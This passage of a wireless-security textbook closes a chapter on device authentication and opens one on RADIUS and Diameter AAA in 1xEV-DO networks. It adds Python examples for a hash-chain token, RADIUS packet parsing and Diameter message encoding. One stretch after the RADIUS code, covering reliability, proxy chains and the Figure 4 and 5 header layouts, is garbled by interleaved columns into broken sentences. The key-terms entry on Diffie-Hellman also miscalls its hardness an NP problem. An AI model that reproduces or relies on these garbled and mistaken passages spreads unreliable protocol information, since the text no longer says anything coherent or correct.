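        # the predecessor of the stored value, and no later token can be derived from it.
        if hmac.compare_digest(hash_step(token), self._last_accepted):
            self._last_accepted = token
            return True
        self.rejected += 1
        return False


def run_demo(chain_length: int = 8) -> dict:
    """Constructed scenario: one card and server sharing a chain, plus a replay attempt."""
    preshared_key = os.urandom(32)  # constructed secret, written into the card at issue time
    card = HashChainCard(preshared_key, chain_length)
    server = AuthServer(card.anchor)

    first = card.next_token()
    first_ok = server.verify(first)
    replay_ok = server.verify(first)           # same token a second time: must fail
    second_ok = server.verify(card.next_token())

    # Drain the remaining tokens to show that the chain is finite and must be renewed.
    accepted_after = 0
    while True:
        try:
            if server.verify(card.next_token()):
                accepted_after += 1
        except RuntimeError:
            break
    return {
        "first_ok": first_ok,
        "replay_ok": replay_ok,
        "second_ok": second_ok,
        "accepted_after": accepted_after,
        "rejections": server.rejected,
    }
```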


Conclusion

Transport encryption and authentication of devices has been the subject of research for a long time and has resulted in sufficiently secure solutions with current technologies. The focus in recent proposals is on the limited possibilities of mobile terminals and the adoption of encryption technologies for mobile and wireless links.

Distributing keys between nodes is solved, except for the first step, which usually requires out-of-band transmissions. A solution for this initial key distribution might be the mobile phone with its integrated smart card and already existing communication possibility. As phones come with NFC, they may act as contact-less cards to distribute keys between devices.

While device authentication is handled sufficiently, user identity is hard to prove. A knowledge-based password or PIN request is not a user-friendly solution. Current proposals tend to be insecure when performing the trade-off between user experience and security.

Research focus should be directed towards personal area and home networks. These networks hold most of the user’s personal private data and content, either purchased or created by the user. Currently no standard solution exists for managing content rights or for access control of own content.

References

3rd Generation Partnership Project (3GPP). (2004, July). Technical standardization groups-system and architecture (TSG-SA) working group 3 (Security) meeting, 3GPP2 security—Report to 3GPP, S3-040588. Retrieved December 20, 2006, from www.3gpp.org/ftp/TSG_SA/WG3_Security/TSGS3_34_Acapulco/Docs/PDF/S3-040588.pdf

3rd Generation Partnership Project 2 (3GPP2). (2007). TSG-X/TIA TR-45.6, 3GPP2 system to wireless local area network interworking to be published as 3GPP2 X.S0028. Retrieved December 22, 2006.

Badra, M., & Hajjeh, I. (2006). Key-exchange authentication using shared secrets. IEEE Computer Magazine, 39(3), 58-66.

Boneh, D., Goh, E.-J., & Boyen, X. (2005). Hierarchical identity based encryption with constant size ciphertext. In Proceedings of Eurocrypt ’05.

Danzeisen, M., Braun, T., Rodellar, D., & Winiker, S. (2006). Heterogeneous communications enabled by cellular operators. IEEE Vehicular Technology Magazine, 1(1), 23-30.

Fathi, H., Shin, S., Kobara, K., Chakraborty, S. S., Imai, H., & Prasad, R. (2006). LR-AKE-based AAA for network mobility (NEMO) over wireless links. IEEE Journal on Selected Areas in Communications, 24(9), 1725-1737.

Fu, Y., He, J., & Li, G. (2006). A composite key management scheme for mobile ad hoc networks. In On the move to meaningful Internet systems, OTM 2006 Workshops (LNCS 4277).

Hoeper, K., & Gong, G. (2006). Key revocation for identity-based schemes in mobile ad hoc networks. In Ad-hoc, mobile, and wireless networks (LNCS 4104).

Hong, S., & Lopez-Benitez, N. (2006). Enhanced group key generation algorithm. In 10th IEEE/IFIP Network Operations and Management Symposium, NOMS 2006 (pp. 1-4).

Jeong, J., Chung, M. Y., & Choo, H. (2006). Secure user authentication mechanism in digital home network environments. In Embedded and Ubiquitous Computing (LNCS 4096).

Kálmán, Gy., & Noll, J. (2006). SIM as a key of user identification: Enabling seamless user identity management in communication networks. Paper presented at the WWRF meeting #17.

Kálmán, Gy., & Noll, J. (2007). SIM as secure key storage in communication networks. In The International Conference on Wireless and Mobile Communications ICWMC’07.

Kim, S., Ahn, T., & Oh, H. (2006). An efficient hierarchical group key management protocol for a ubiquitous computing environment. In Computational Science and Its Applications—ICCSA 2006 (LNCS 3983).

Kwak, J., Oh, S., & Won, D. (2006). Efficient key distribution protocol for electronic commerce in mobile communications. In Applied Parallel Computing (LNCS 3732).

Lee, J.-H., & Chung, T.-M. (2006). Session key forwarding scheme based on AAA architecture in wireless networks. In Parallel and Distributed Processing and Applications (LNCS 4330).

Lim, J.-M., Lim, H.-J., & Chung, T.-M. (2006). Performance evaluation of public key based mechanisms for mobile IPv4 authentication in AAA environments. In Information Networking. Advances in Data Communications and Wireless Networks (LNCS 3961).

Nicholson, A. J., Corner, M. D., & Noble, B. D. (2006). Mobile device security using transient authentication. IEEE Transactions on Mobile Computing, 5(11), 1489-1502.

Noll, J., Ribeiro, V., & Thorsteinsson, S. E. (2005). Telecom perspective on scenarios and business in home services. In Proceedings of the Eurescom Summit 2005 (pp. 249-257).

Nützel, J., & Beyer, A. (2006). How to increase the security of digital rights management systems without affecting consumer’s security. In Emerging Trends in Information and Communication Security (LNCS 3995).

Pfeifer, T., Savage, P., Brazil, J., & Downes, B. (2006). VidShare: A management platform for peer-to-peer multimedia asset distribution across heterogeneous access networks with intellectual property management. In Autonomic Management of Mobile Multimedia Services (LNCS 4267).

Phillips, T., Karygiannis, T., & Kuhn, R. (2005). Security standards for the RFID market. IEEE Security & Privacy Magazine, 3(6), 85-89.

Popescu, B. C., Crispo, B., Tanenbaum, A. S., & Kamperman, F. L. A. J. (2004). A DRM security architecture for home networks. In Proceedings of the 4th ACM workshop on Digital rights management, Washington, DC.

Ren, K., Lou, W., Kim, K., & Deng, R. (2006). A novel privacy preserving authentication and access control scheme for pervasive computing environments. IEEE Transactions on Vehicular Technology, 55(4), 1373-1384.

Rieback, M. R., Gaydadjiev, G. N., Crispo, B., Hofman, R. F. H., & Tanenbaum, A. S. (2006, December 3-8). A platform for RFID security and privacy administration. Paper presented at the 20th USENIX/SAGE Large Installation System Administration Conference—LISA 2006, Washington, DC.

Sufatrio, K. Y. L. (1999, June 23-25). Registration protocol: A security attack and new secure minimal public-key based authentication. Paper presented at the International Symposium on Parallel Architectures, Algorithms and Networks, ISPAN’99, Fremantle, Australia.

Sur, C., & Rhee, K. H. (2006). An efficient authentication and simplified certificate status management for personal area networks. In Management of Convergence Networks and Services (LNCS 4238).

Zou, X., Thukral, A., & Ramamurthy, B. (2006). An authenticated key agreement protocol for mobile ad hoc networks. In Mobile Ad-hoc and Sensor Networks (LNCS 4325).

Key Terms

Diffie-Hellman Key Exchange: Diffie-Hellman key exchange is a procedure which allows negotiating a secure session key between parties who do not have any former information about each other. The negotiation messages are in band, but because of the non-polynomial (NP) problem used in the procedure, adversaries are not able to compromise it.

Mutual Authentication: Mutual authentication occurs when the communicating parties can mutually check each other’s identity, thus reducing the possibility of a man-in-the-middle attack or other integrity attacks.

Out of Band Key Delivery: Out of band key delivery occurs when an encryption key is delivered by a means which is inaccessible from inside the network it will be used in. An example is to carry a key on a USB stick between parties, where the key will never be transmitted over the network.

Rootkit: A rootkit is a kind of software to hide other programs. Mainly used by Trojans, they enable hidden applications to access local resources without user knowledge.

Seamless Authentication: Seamless authentication is a method where the user is authenticated towards an entity without the burden of credential requests. For high security requirements, transparent methods are not applicable, but they can provide additional security in traditional username/password or PIN-based sessions.

Session Key: A session key is a short-lived, randomly generated encryption key to protect one or a group of messages. The main purpose is to use expensive encryption operations only when starting a session and to use a simpler-to-manage cipher in the later part.




Chapter XII
Architecture and Protocols for
Authentication, Authorization,
and Accounting in the Future
Wireless Communications
Networks
Said Zaghloul
Technical University Carolo-Wilhelmina – Braunschweig, Germany

Admela Jukan
Technical University Carolo-Wilhelmina – Braunschweig, Germany

Abstract

The architecture and protocols for authentication, authorization, and accounting (AAA) are one of the most important design considerations in third generation (3G)/fourth generation (4G) telecommunication networks. Many advances have been made to exploit the benefits of the current system, the remote authentication dial in user service (RADIUS) protocol, and the evolution to migrate into the more secure, robust, and scalable protocol Diameter. Diameter is the protocol of choice for the IP multimedia subsystem (IMS) architecture, the core technology for the next generation networks. It is envisioned that Diameter will be widely used in various wired and wireless systems to facilitate robust and seamless AAA. In this chapter, we provide an overview of the major AAA protocols RADIUS and Diameter, and we discuss their roles in practical 1xEV-DO network architectures in the three network tiers: access, distribution, and core. We conclude the chapter with a short summary of the current and future trends related to the Diameter-based AAA systems.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Architecture and Protocols for AAA

Introduction

Many 3G cellular providers consider the architecture for the authentication, authorization, and accounting (AAA) system as one of the most important functional blocks for the success of service delivery. Typically, users are authenticated when requesting a service and only after successful authentication are they authorized to use the service. Once the user is granted access to the service, the network generates accounting messages based on the user’s activity. Currently, the remote authentication dial in user service (RADIUS) protocol is the most widely deployed protocol in cellular networks to perform subscriber AAA. Since RADIUS is susceptible to various security threats, a standard developed by the Internet Engineering Task Force (IETF), called Diameter, was proposed to substitute RADIUS in the future. Unlike its predecessor RADIUS, Diameter offers reliable and secure communication enabling seamless roaming among operators and support of auditability, capability negotiation, and peer discovery and configuration. Diameter augments its reliable transmission capabilities by defining failover mechanisms and thus embraces two crucial elements for the robust communication of sensitive billing and authentication messages. Since most of the current equipment and radio standards only support RADIUS for authentication, it is evident that cellular network operators will be running both protocols in the near future. Therefore, it cannot be sufficiently emphasized that prudent decisions need to be made when designing AAA systems with multiple protocols in mind at the three major tiers: access, distribution, and core.

The purpose of this chapter is to address the specific aspects of the AAA system architecture at these three major tiers. Given the broadness of the scope and the myriad of existing AAA standards, we sharpen our focus on a reference 3G cellular network architecture which we define and show in Figure 1. As can be seen from Figure 1, a typical AAA system in 3G architectures is characterized by three distinctive architectural elements: (1) radio access network (RAN), (2) distribution network based on mobile IP (MIP), and (3) a multimedia domain (MMD)1 based core including both IP multimedia system (IMS) networks and Internet access deployments. The RAN, based on one of the 1x carrier evolution data only (1xEV-DO) standards/revisions for wireless transmission, consists of various base stations (BSs) and radio network controllers (RNCs). The distribution network consists of the MIP elements, that is, the packet data serving node (PDSN) playing the foreign agent’s (FA) role and the home agent (HA). It is worth observing that this architecture has a hierarchical nature, where multiple BTSs are governed by a single RNC and multiple RNCs are covered by a single PDSN region. Finally, at the core, we have the IMS elements, including its standardized elements such as the call session control functions (CSCF) and home subscriber servers (HSS) enabling robust applications and services such as gaming, presence, voice over IP (VoIP), and so forth.

Upon receiving a mobile subscriber call, the RNC authenticates the subscriber’s request by communicating with the access network AAA (AN-AAA) over the RADIUS-based A12 interface. Once authenticated, the RNC contacts the PDSNs through the A10/A11 interface (3rd Generation Partnership Project 2 [3GPP2] A.S0008-B, 2006). Note that since the A12 interface is RADIUS based, a translation agent (TA) needs to be used to translate the RADIUS requests to Diameter for authentication. In Figure 1, we illustrate that the AAA contacts an Oracle-based users’ database to authenticate the incoming calls. We assume that the TA, AAA, and the AN-AAA are collocated in the same physical platform for simplicity. For higher reliability, RNCs usually connect to multiple AAAs (one primary and another secondary AAA) to allow redundancy to admit users into the system in case of AN-AAA connectivity problems.

Once admitted, the mobile node (MN) starts a point-to-point (PPP) session with the PD N. During the process of PPP establishment, the PDSN advertises itself as a MobileIP FA and challenges the user. The user then replies with a Mobile IP registration request that answers the PDSN’s challenge. The PDSN forwards this information to the AAA. The AAA validates the user’s response based on the MN-AAA shared secret and responds to the PDSN. In case of successful authentication, the PDSN proceeds with the MobileIP registration process with the HA and establishes a MobileIP tunnel to serve the user’s traffic. At this point, the PDSN starts to generate accounting towards the AAA server to reflect the subscriber’s usage. Accounting data is reformatted and communicated to the upstream billing systems for further processing. Here, we assume simple secure FTP (SFTP) communication. Note that the PDSN also connects to multiple AAAs for redundancy purposes. In our illustrative architecture, the PDSN implements the Diameter MobileIP application and thus needs no translation functionality.

Figure 1. 1xEV-DO reference network architecture. [Figure: the 1xEV-DO radio access network (RAN) with BTS 1-6 connected over T1 circuits to an RNC; the RNC reaches the TA/AN-AAA over A12 (RADIUS) and the primary PDSN (FA) over A10/A11; the PDSN connects to the HA through a MIP tunnel and to the AAA over Diameter with a failover link; the AAA is backed by an Oracle users’ database and feeds the billing system over SFTP; the IMS and the Internet form the multimedia domain (MMD).] Acronyms: BTS, Base Transceiver Station; RNC, Radio Network Controller; AN/AAA, Access Network AAA; PDSN, Packet Data Serving Node; MIP, Mobile IP; FA, Foreign Agent; HA, Home Agent; TA, Diameter Translation Agent; IMS, IP Multimedia Subsystem; SFTP, Secure File Transfer Protocol; SQL, Structured Query Language.

In this illustrative reference architecture, RADIUS is deployed in the access tier and translation agents are utilized to convert between RADIUS and Diameter, while Diameter applications at the distribution and network tiers are natively supported. Following this example, we organize the chapter as follows. First, we present the AAA concept and quickly survey RADIUS and its current deployment features. Then, we discuss the evolution from RADIUS to Diameter and shortly review the current Diameter standard. Afterwards, we illustrate a prospective end-to-end application of Diameter at all three major network tiers in the wireless network, including access, distribution, and core. Finally, we summarize the chapter and discuss open issues and future work.

Background

The RADIUS Protocol

AAA systems received significant attention from network service providers throughout the past decade. The need for a standardized, simple, and scalable protocol that accomplishes the required AAA functionality was the main motivation for the introduction of the RADIUS protocol (Rigney, 2000; Rigney, Willens, Rubens, & Simpson, 2000; RFC 2866). In 1998, RADIUS was the only protocol that seemed to satisfy the IETF NASREQ working group’s requirements for authentication and authorization (Rigney, 1998). Due to its wide implementation by many networking equipment vendors, its simplicity and scalability, it became the protocol of choice for many service providers. RADIUS was quickly extended to support various networking protocols such as MobileIP (Perkins, 2002), IP security (IPsec) (Kent & Seo, 2005), and IEEE 802.1x authentication.

Figure 2. A simple service provider’s architecture with AAA functionality. [Figure: a user reaches the NAS over PPP through the PSTN; the NAS forwards traffic to the Internet over TCP/IP and exchanges RADIUS traffic (authentication & authorization, accounting) with the AAA server, which is backed by a users’ database (SQL, LDAP) and passes accounting data to the billing systems (S/FTP, SQL).]
In RADIUS, after the user is granted access, the network access server (NAS) generates accounting messages based on the user’s activity. The NAS is usually the gateway to the IP network. Routers, WiFi access points (APs), PDSNs, and gateway general packet radio service (GPRS) support nodes (GGSN) in GPRS networks are typical examples of NASs in telecom networks. As shown in Figure 2, a user tries to access the Internet through a dialup modem connection. The PPP protocol is mainly used to establish the communication between the user and the NAS, that is, the router in this example. The NAS attempts to authenticate the user either through the password authentication protocol (PAP) or the challenge handshake authentication protocol (CHAP). Upon obtaining the responses from the client, the NAS generates an Access-Request and sends it to the RADIUS server in order to validate the user’s responses. Typically, the RADIUS server is connected to an external database that contains the user’s credentials and authorized services. Thus, the RADIUS server returns an Access-Accept message if the user credentials are valid, otherwise it returns an Access-Reject. The Access-Accept message may contain authorization information. For example, an Access-Accept message may contain filters to grant the user access to internal networks, specific routing instructions to the NAS, quality of service (QoS) settings, and so forth. This authorization set is returned as a group of attribute value pairs (AVPs) in the Access-Accept message.2 Once the user is granted access, the NAS generates accounting messages based on the user’s activity (connection time, total bytes used, etc.).

The RADIUS message format is shown in Figure 3. It consists of a 20 octet header followed by multiple AVPs. AVPs include standardized types and values. For example, the username is passed to the AAA server using the User-Name attribute. To allow expandability, the AVP type 26 is reserved for vendor-specific AVPs (VSAs). Thus, a vendor requests a Vendor ID from the Internet Assigned Numbers Authority (IANA) to be able to define specific attributes for its equipment. The following are sample vendor ID values: Cisco (9), Nortel (2637), 3GPP (10415), and 3GPP2 (5535). Usually, AAA implementations include dictionary files that define the AVP type and the expected values; for example, refer to Braunöder (2003). RADIUS accounting is composed of three primary message types: (1) Accounting-Start, (2) Accounting-Interim, and (3) Accounting-Stop. Accounting messages usually carry the user’s session information. For example, in CDMA2000-based systems accounting messages may contain the user’s assigned IP address; user’s sent and received byte counts; user’s electronic serial number; calling and called station numbers; accounting session ID; BS ID; and so forth (3GPP2 A.S0008-B, 2006; 3GPP2 X.S0011-005-C, 2006). Note that the electronic serial number and the BS ID attributes are 3GPP2 VSAs augmented to the standard RADIUS AVPs.

Figure 3. RADIUS message format. [Figure: header and AVP layouts, reproduced as text.]

RADIUS header (20 octets): Code (1 octet), ID (1 octet), Length (2 octets), Authenticator (16 octets), followed by multiple AVPs (variable).
Common RADIUS codes: Access-Request, Access-Accept, Access-Reject, Accounting-Request, Accounting-Response, Access-Challenge.
Attribute value pair (AVP) structure: Attribute (1 octet), Length (1 octet), Value (variable).
Example vendor-specific AVP structure: Attribute Value = 26 (1 octet), Length (1 octet), Vendor ID (4 octets), Vendor Type (1 octet), Vendor Length (1 octet), Vendor Specific Value (variable).

Notes: The authenticator field is a random nonce in the requests, while in the responses it is an MD5 hash calculated using the shared secret between the NAS and the AAA server and the random nonce from the corresponding request. An Access-Challenge is usually used when multiple round trips are needed for authentication, for example RADIUS extensions for EAP. Accounting requests are identified by the value of the Acct-Status-Type attribute (AVP 40) {1 = Start, 2 = Stop, 3 = Interim}.
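As an added example (not code from the chapter), the following Python parses the 20-octet RADIUS header and the Attribute/Length/Value list shown in Figure 3, unpacks a type-26 vendor-specific AVP, and checks a response authenticator against the request nonce and the shared secret as described in the figure notes. The sample packet, secret and vendor attribute values are constructed for the demonstration; the packet code numbers are the RFC 2865/2866 values, and the 3GPP2 vendor ID 5535 is the value quoted in the text.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass, field
from typing import List, Optional

CODES = {1: "Access-Request", 2: "Access-Accept", 3: "Access-Reject",
         4: "Accounting-Request", 5: "Accounting-Response", 11: "Access-Challenge"}
ATTR_VENDOR_SPECIFIC = 26
VENDOR_3GPP2 = 5535  # vendor ID quoted in the chapter text
HEADER_LEN = 20


@dataclass
class Avp:
    type: int
    value: bytes
    vendor_id: Optional[int] = None   # set only for type-26 vendor-specific AVPs
    vendor_type: Optional[int] = None


@dataclass
class RadiusPacket:
    code: int
    identifier: int
    length: int
    authenticator: bytes
    avps: List[Avp] = field(default_factory=list)


def parse_avps(data: bytes) -> List[Avp]:
    """Walk the Attribute/Length/Value list; a type-26 AVP carries a nested vendor header."""
    avps, pos = [], 0
    while pos < len(data):
        if pos + 2 > len(data):
            raise ValueError("truncated AVP header")
        atype, alen = data[pos], data[pos + 1]
        if alen < 2 or pos + alen > len(data):
            raise ValueError(f"bad AVP length {alen} at offset {pos}")
        value = data[pos + 2:pos + alen]
        if atype == ATTR_VENDOR_SPECIFIC:
            # Vendor ID (4 octets), Vendor Type (1), Vendor Length (1), vendor-specific value
            if len(value) < 6:
                raise ValueError("vendor-specific AVP too short")
            vendor_id = struct.unpack("!I", value[:4])[0]
            vtype, vlen = value[4], value[5]
            if vlen < 2 or 4 + vlen > len(value):
                raise ValueError("bad vendor attribute length")
            avps.append(Avp(atype, value[6:4 + vlen], vendor_id, vtype))
        else:
            avps.append(Avp(atype, value))
        pos += alen
    return avps


def parse_packet(data: bytes) -> RadiusPacket:
    """Parse Code(1) ID(1) Length(2) Authenticator(16) and the AVPs, validating Length."""
    if len(data) < HEADER_LEN:
        raise ValueError("packet shorter than the RADIUS header")
    code, ident, length = struct.unpack("!BBH", data[:4])
    if length < HEADER_LEN or length > len(data):
        raise ValueError(f"Length field {length} inconsistent with {len(data)} octets")
    return RadiusPacket(code, ident, length, data[4:HEADER_LEN], parse_avps(data[HEADER_LEN:length]))


def response_authenticator(packet: bytes, request_auth: bytes, secret: bytes) -> bytes:
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret), as in the Figure 3 notes."""
    return hashlib.md5(packet[:4] + request_auth + packet[HEADER_LEN:] + secret).digest()


def verify_response(response: bytes, request_auth: bytes, secret: bytes) -> bool:
    """True only if the response came from a peer holding the shared secret for this request."""
    pkt = parse_packet(response)
    expected = response_authenticator(response[:pkt.length], request_auth, secret)
    return hmac.compare_digest(pkt.authenticator, expected)


def build_avp(atype: int, value: bytes) -> bytes:
    return bytes([atype, 2 + len(value)]) + value


def build_vsa(vendor_id: int, vtype: int, value: bytes) -> bytes:
    return build_avp(ATTR_VENDOR_SPECIFIC, struct.pack("!I", vendor_id) + bytes([vtype, 2 + len(value)]) + value)


def build_packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, HEADER_LEN + len(attrs)) + authenticator + attrs


def demo() -> dict:
    """Constructed exchange: an Access-Accept for request ID 7 carrying a 3GPP2 VSA."""
    secret = b"constructed-shared-secret"       # constructed, not a deployment value
    request_auth = bytes(range(16))             # stands in for the request's random nonce
    attrs = build_avp(1, b"user@example.net") + build_vsa(VENDOR_3GPP2, 1, b"\x00\x01")
    unsigned = build_packet(2, 7, bytes(16), attrs)
    accept = build_packet(2, 7, response_authenticator(unsigned, request_auth, secret), attrs)
    pkt = parse_packet(accept)
    vsa = next(a for a in pkt.avps if a.vendor_id is not None)
    tampered = accept[:-1] + bytes([accept[-1] ^ 0x01])   # one flipped bit in the VSA value
    return {
        "code": CODES[pkt.code],
        "user": pkt.avps[0].value.decode(),
        "vendor": vsa.vendor_id,
        "valid": verify_response(accept, request_auth, secret),
        "tampered_valid": verify_response(tampered, request_auth, secret),
    }
```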

RADIUS offers reliability over the intrinsically the request to another RADIUS server. Such poli-
3
unreliable user datagram protocol (UDP) by requir- cies are occasionally based on the domain in the
ing a response for each request. If a response is user’snetworkaccessidentifier( NAI)Standards .
notreceivedwithinapredefinedtimeperiod (Aboba &TO)( Vollbrecht,
, 1999) refer to this setup as
the request times out. It is then up to the requestor the proxy-chain configuration. For instance, in a
(RADIUS client) to either retry the same server, roamingscenariothehostAAAisusually - config
another RADIUS server, or even drop the request. ured to forward AAA requests from the hosting
The timeout value and the maximum number of NAS to the home AAA. Note that multiple proxies
allowed retransmissions are configurable - paramalong the path to the home AAA
maybe traversed
eters at the client. It is noteworthy to mention that server as shown in Figure 4.
the failover mechanism was not standardized in
RADIUS and often raised interoperability issues Evolution from rAdIus to diameter
due to the inherent differences in the AAA imple-
mentations (Calhoun, Loughney, Guttman, Zorn, Diameter Protocol Overview
& Arkko, 2003).
RADIUS follows a client/server model where As network architectures evolved and with the
clients maybe NASs or other RADIUS servers. tremendous growth in the wireless data infrastruc-
RADIUS clients and servers share a common secret tures, secure inter-domain communication among
to secure their communications. This method is various AAA servers to exchange subscribers’
weak and is only intended to secure communica- credentials, profiles, and accounting - informa
tion within a trusted network.4 Sometimes an AAA tion became an absolute necessity. Despite its
server serves as a RADIUS client/proxy when it is tremendous success, RADIUS inherent security
provisioned with a policy instructing it to forward vulnerabilities, its questionable transport reli-


Architecture and Protocols for AAA

Figure4.Proxychainconfiguration
visited network Intermediate broker network Home network

access-request access-request
visited Home
rAdIus Host rAdIus rAdIus
network’s rAdIus
nAs AAA Proxy 1 Proxy 2
AAA server
access-accept access-accept

Figure5.Diameterprotocol
legend
Fields carried over from RADIUS

New Diameter fields

4-bits
R P E T Reserved
request =  Proxiable =  Error =  Potentially Retransmitted = 
Answer = 0 Local Only = 0

1 octet 3 octets 1 octet 3 octets 4 octets


Version Message Command Command
Set to 1
Application ID
Length Flags Code
Hop-By-Hop End -to-End
Multiple AVPs
Identifier Identifier
4 octets 4 octets variable

4 octets 1 octet 3 octets 4 octets 4 -bits


AVP Code Flags AVP Length Vendor -ID (opt) Data

v : Vendor Specific
V M P Reserved M : Mandatory
P : Requires End-to-End Security

ability, and its limited redundancy support were by standardized failover and failback (recovery)
the primary reasons for the introduction of the mechanisms.
Diameter protocol (Calhoun et al., 2003) as a sub- Diameter RFC reused many of the RADIUS
stitute protocol. Diameter was carefully designed message codes and attributes and extended them.
to address security and reliability while thoroughly Figure 5 shows Diameter’s header format. The
exploitingthebenefitsofRADIUS.Thus,secure framed fields in Figure 5 are those carried over
transmission mechanisms using a choice of IPsec from RADIUS. In contrast to RADIUS, note the
or transport layer security (TLS) protocols were introduction of the Version, Command Flags, Ap-
integrated into Diameter, while reliable transport plication ID, Hop-By-Hop ID, and End-to-End ID
was enhanced by designing Diameter to run over fieldsinDiameter.Alsonotetheincreaseinsizeof
either stream control transmission protocol (SCTP) themessagelengthfieldfrom ( octets
2 inRADIUS
or transmission control protocol (TCP) supported to 3 in Diameter). Note also that the authenticator


Architecture and Protocols for AAA

field is no longer present, as security is guaranteed by the integrated IPsec and TLS protocols. Command codes in Diameter start from 257 to maintain compatibility with RADIUS. Unlike in RADIUS, the requests and answers have the same command codes in Diameter; for example, the accounting request (ACR) and answer (ACA) commands both have the command-code 271. Diameter nodes recognize message types (e.g., whether a message is an ACA or an ACR) based on the "R" flag in the command flags shown in Figure 5. The "P" flag instructs nodes whether a message must be processed locally and should not be forwarded. The "E" flag, along with the result-code AVP, is used to indicate errors (and possibly redirection, as we will see later). Finally, the "T" flag is used to indicate a possible duplication in case of retransmissions after a failover. Figure 5 also shows Diameter's AVP structure. The most significant addition is the inclusion of the flags field.

Diameter Agents

To facilitate migration from the current RADIUS infrastructure, Diameter offers indirect backward compatibility by introducing translation agents to convert RADIUS messages into Diameter messages and vice versa. Besides the main incentive of reusing as much of the RADIUS codes and attributes as possible for simpler migration, such reuse is also beneficial in reducing the amount of processing on the translation agents. Diameter supports a broader definition of scalability to suit roaming scenarios by including relay and redirect agents while still maintaining the RADIUS proxy agent model, therefore allowing the deployment of different architectures.

A proxy agent is used to forward Diameter traffic to another Diameter peer in order to handle the request. The decision to forward requests is policy based, as in RADIUS. Proxy agents may modify packets and may originate rejection messages in case of policy violation, for example, when receiving requests from unknown realms. On the other hand, relay agents only forward requests without modifying any of the non-routing attributes. Relays and proxies are required to append the route-record AVP with the identity of the peer they received the request from prior to forwarding it. The reader is encouraged to refer to Calhoun et al. (2003) for more information on routing AVPs and their usage. Finally, redirect agents, as their name implies, are used to refer clients to alternative AAAs. Redirect agents may act as proxies or end servers for other requests. For example, an AAA server may handle the Diameter base accounting messages while redirecting requests that require Diameter server support for MobileIP. Figure 6 summarizes the functionality of Diameter agents and illustrates the message flow in order of transmission. In Figure 6a, the relay agent only forwards the Diameter Authentication and Authorization Request (AAR) to Provider B's Diameter server. In Figure 6b, the proxy agent has an outbound policy for the AAR to add or override the session Idle-Timeout attribute to 4,000 seconds and the maximum link MTU to 1,300 bytes. It is also configured with an inbound policy for the Authentication and Authorization Answers (AAA) to remove any instructions for compression. Figure 6c shows the translation agent's role. Note that a translation agent may at the same time act as a proxy, that is, add, modify, or remove AVPs while converting between RADIUS and Diameter. Finally, as shown in Figure 6d, the Diameter client issues an AAR towards the redirect agent. Once received, the redirect agent sends back an AAA with the "E" flag set and the result-code AVP set to DIAMETER_REDIRECT_INDICATION, instructing the Diameter client to contact dest.com by using the Redirect-Host AVP. A redirect agent may also provide an indication on the usage of the redirect instruction, that is, whether its response is meant for all realms or simply restricted to the request's realm, whether the redirection policy should be cached at the requestor (client), and for how long, and so forth.

Server Initiated Messages in Diameter

Unlike RADIUS, Diameter is a peer-to-peer protocol where any Diameter node may act as a client or server at any time. Peers are simply the next hop nodes that a Diameter node communicates with. A significant improvement over RADIUS is that Diameter has mandatory support of server-initiated messages to allow operations like re-authentication
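The header layout described above (1-octet version, 3-octet length, command flags, 3-octet command code, Application-ID, Hop-by-Hop ID, End-to-End ID) and the AVP layout with its flags field can be encoded and parsed in a few dozen lines. The following is an added example, not code from the chapter or from any Diameter implementation; it follows the field order of RFC 3588, and the sample ACR it builds (Session-Id, Accounting-Record-Type, application id 3 for base accounting) is constructed here. Note how the parser refuses a message whose length field disagrees with the bytes received, and how ACR and ACA are told apart only by the "R" flag, since both carry command code 271.

```python
import struct

# Command Flags bits (RFC 3588, section 3).
FLAG_R = 0x80  # Request; clear means Answer
FLAG_P = 0x40  # Proxiable; clear means process locally, do not forward
FLAG_E = 0x20  # Error (used together with Result-Code)
FLAG_T = 0x10  # Potentially re-transmitted after a failover

# AVP Flags bits (RFC 3588, section 4.1).
AVP_V = 0x80   # Vendor-specific
AVP_M = 0x40   # Mandatory: receiver must understand the AVP or reject the message

CMD_ACR_ACA = 271           # Accounting-Request and Accounting-Answer share this code
AVP_SESSION_ID = 263
AVP_ACCT_RECORD_TYPE = 480  # value 2 = START_RECORD in RFC 3588


def encode_avp(code, data, mandatory=True):
    """One AVP: code (4 octets), flags (1), length (3), data, padded to 4 octets.
    The length field covers header and data but not the padding."""
    length = 8 + len(data)
    flags = AVP_M if mandatory else 0
    header = struct.pack("!I", code) + bytes([flags]) + length.to_bytes(3, "big")
    return header + data + b"\x00" * ((-len(data)) % 4)


def encode_message(command, flags, application_id, hop_by_hop, end_to_end, avps):
    """Diameter header: version (1), length (3), flags (1), command code (3),
    Application-ID (4), Hop-by-Hop ID (4), End-to-End ID (4), then the AVPs."""
    body = b"".join(avps)
    length = 20 + len(body)
    return (bytes([1]) + length.to_bytes(3, "big") + bytes([flags])
            + command.to_bytes(3, "big")
            + struct.pack("!III", application_id, hop_by_hop, end_to_end)
            + body)


def decode_message(raw):
    """Parse header and AVPs, rejecting inconsistent lengths instead of over-reading."""
    if len(raw) < 20 or raw[0] != 1:
        raise ValueError("not a Diameter version 1 message")
    length = int.from_bytes(raw[1:4], "big")
    if length != len(raw):
        raise ValueError("Message Length does not match the bytes received")
    flags = raw[4]
    command = int.from_bytes(raw[5:8], "big")
    application_id, hop_by_hop, end_to_end = struct.unpack("!III", raw[8:20])
    avps, pos = [], 20
    while pos < length:
        if pos + 8 > length:
            raise ValueError("truncated AVP header")
        code = struct.unpack("!I", raw[pos:pos + 4])[0]
        avp_flags = raw[pos + 4]
        avp_len = int.from_bytes(raw[pos + 5:pos + 8], "big")
        if avp_len < 8 or pos + avp_len > length:
            raise ValueError("malformed AVP length")
        avps.append({"code": code, "mandatory": bool(avp_flags & AVP_M),
                     "vendor": bool(avp_flags & AVP_V),
                     "data": raw[pos + 8:pos + avp_len]})
        pos += avp_len + ((-avp_len) % 4)   # skip padding to the next 4-octet boundary
    return {"request": bool(flags & FLAG_R), "proxiable": bool(flags & FLAG_P),
            "error": bool(flags & FLAG_E), "retransmitted": bool(flags & FLAG_T),
            "command": command, "application_id": application_id,
            "hop_by_hop": hop_by_hop, "end_to_end": end_to_end, "avps": avps}


def message_type(parsed):
    """ACR and ACA carry the same command code; only the R flag tells them apart."""
    if parsed["command"] == CMD_ACR_ACA:
        return "ACR" if parsed["request"] else "ACA"
    return "command %d %s" % (parsed["command"], "request" if parsed["request"] else "answer")


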